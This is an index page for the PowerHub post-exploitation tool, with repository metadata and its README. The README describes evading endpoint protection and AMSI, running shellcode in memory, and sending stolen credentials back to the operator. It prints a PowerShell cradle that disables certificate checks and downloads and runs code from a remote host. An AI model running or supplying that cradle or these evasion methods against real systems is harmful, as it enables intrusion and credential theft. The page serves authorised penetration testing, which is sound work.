Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/adrianvollmer/powerhub

A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting
https://github.com/adrianvollmer/powerhub

pentest post-exploitation powershell python remote-admin-tool

Last synced: about 2 months ago
JSON representation

A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting

Host: GitHub
URL: https://github.com/adrianvollmer/powerhub
Owner: AdrianVollmer
License: mit
Created: 2018-07-29T07:45:05.000Z (about 6 years ago)
Default Branch: master
Last Pushed: 2024-04-13T13:29:07.000Z (5 months ago)
Last Synced: 2024-08-01T08:10:33.437Z (about 2 months ago)
Topics: pentest, post-exploitation, powershell, python, remote-admin-tool
Language: PowerShell
Homepage: https://adrianvollmer.github.io/PowerHub/
Size: 7.08 MB
Stars: 707
Watchers: 18
Forks: 113
Open Issues: 0
Metadata Files:
- Readme: README.md
- Changelog: CHANGELOG.md
- License: LICENSE

Awesome Lists containing this project

README

        PowerHub

========

PowerHub is a convenient post exploitation tool for PowerShell which aids a

pentester in transferring data, in particular code which may get flagged by

endpoint protection. Features:

* Fileless

* Stateless

* Cert pinning

* String "obfuscation" by RC4 encryption

* Choose your AMSI Bypass

* Transparent aliases for in-memory execution of C# programs

![PowerHub Webapp](docs/img/powerhub-webapp.png)

![PowerHub Webapp](docs/img/powerhub-sharphound.png)

During an engagement where you have a test client available, one of the

first things you want to do is run SharpHound, Seatbelt, PowerUp,

Invoke-PrivescCheck or PowerSploit. So you need to download the files,

mess with endpoint protection, disable the execution policy, etc.

PowerHub provides an (almost) one-click-solution for this. Oh, and you can

also run arbitrary binaries (PE and shell code) entirely in-memory using

PowerSploit's modules, which is sometimes useful to bypass application

whitelisting.

Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back

either as a file or a text snippet, via the command line or the web

interface. PowerHub also helps with collaboration in case you're a small

team.

Here is a simple example (grab information about local groups with PowerView

and transfer it back):

```ps1con

PS C:\Users\avollmer> [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$Nxois='bZeVBC4vZfakT5SmCcaFam6IRY6UNLnC';$Plukgmio=New-Object Net.WebClient;IEX $Plukgmio.DownloadString('https://192.168.11.2:8443/')

  _____   _____  _  _  _ _______  ______ _     _ _     _ ______

 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]

 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]

2.0.0                       written by Adrian Vollmer, 2018-202

Run 'Help-PowerHub' for help

PS C:\Users\avollmer> Get-HubModule PowerView

Name   : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1

Type   : ps1

N      : 205

Loaded : True

Alias  :

PS C:\Users\avollmer> Get-LocalGroup | PushTo-Hub -Name groups.json

```

Documentation

=============

Read the docs [here](https://adrianvollmer.github.io/PowerHub/).

* **Installation:** 

* **Usage:** 

* **Contributing:** 

* **Changelog:** 

Credits

=======

PowerHub is partially based on the awesome work of zc00l, @am0nsec, mar10,

p3nt4. And of course, it would be nothing without @harmj0y,

@mattifestation and the many other contributors to

[PowerSploit](https://github.com/PowerShellMafia/PowerSploit).

Thanks!

Author and License

==================

Adrian Vollmer, 2018-2023. MIT License.

Disclaimer

==========

Use at your own risk. Do not use without full consent of everyone involved.

For educational purposes only.